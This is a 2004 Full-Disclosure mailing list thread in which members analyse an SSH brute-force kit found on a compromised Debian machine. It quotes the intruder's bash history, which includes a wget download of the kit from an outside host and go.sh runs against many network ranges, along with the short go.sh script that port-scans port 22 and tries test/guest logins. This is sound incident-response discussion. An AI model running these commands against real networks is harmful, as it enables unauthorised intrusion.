Re: Re: Automated SSH login attempts?

[Ron DuFresne <dufresne () winternet com>]

This all looks very similair to the couple year old ssh1 hack, I recall
some of these same files and binaries I think from that old hack, but,
this looks like someone took an old hack and tried to rework it as a brute
forcer for poorly setup systems.

Thanks,

Ron DuFresne


On Thu, 29 Jul 2004, Andrei Galca-Vasiliu wrote:

> By the way, you have to be root to use "ss":
>
> sweet@andrei:~/ssh$ ./go.sh 82.77.45
> scanning network 82.77.*.*
> usec: 30000, burst packets 50
> using inteface eth0
> ERROR: UID != 0
>
>
> Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek
> povestea:
> > Hmmm - I have also been getting those login attemps, but thought them to
> > be harmless. Maybe they are not *that* harmless, though... Today I
> > managed to get my hands on a machine that was originating such login
> > attempts. I must admit I am far from being a linux security expert, but
> > this is what I've found out up to now:
> >
> > Whoever broke into the machine did not take any attempts to cover up his
> > tracks - this is what I found in /root/.bash_history:
> >
> > ------
> > id
> > uname -a
> > w
> > id
> > ls
> > wgte frauder.us/linux/ssh.tgz
> > wget frauder.us/linux/ssh.tgz
> > tar xzvf ssh.tgz
> > tar xvf ssh.tgz
> > ls
> > cd ssh
> > ls
> > ./go.sh 195.178
> > ls
> > pico uniq.txt
> > vi uniq.txt
> > ls
> > rm -rf uniq.txt
> > ./go.sh 167.205
> > ls
> > rm -rf uniq.txt  vuln.txt
> > ./go.sh 202.148.20
> > ./go.sh 212.92
> > ./go.sh 195.197
> > ./go.sh 147.32
> > ./go.sh 213.168
> > ./go.sh 134.176
> > ./go.sh 195.83
> > ------
> >
> > um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
> > binaries:
> >
> > go.sh:
> > -------
> > ./ss 22 -b $1 -i eth0 -s 6
> > cat bios.txt |sort | uniq > uniq.txt
> > ./sshf
> > -------
> >
> > * 'ss' apparently is some sort of portscanner
> > * 'sshf' connects to every IP in uniq.txt and tries to log in as user
> > 'test' first, then as user 'guest' (according to tcpdump).
> >
> > This does not seem to be a stupid brute force attack, as there is only
> > one login attempt per user. Could it be that the tool tries to exploit
> > some vulnerability in the sshd, and just tries to look harmless by using
> > 'test' and 'guest' as usernames?
> >
> > The compromised machine was running an old debian woody installation
> > which had not been upgraded for at least one year, the sshd version
> > string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
> >
> > As already mentioned, I am far from being an expert, but if I can assist
> > in further testing, then let me know. Please CC me, I am not subscribed
> > to the list.
> >
> > cheers,
> > Stefan
> >
> >
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> --
> *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.
>
> Andrei Galca-Vasiliu
> Folio Q Advertising
> www.fq.ro
>
>
> Security is an illusion...
>
> *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html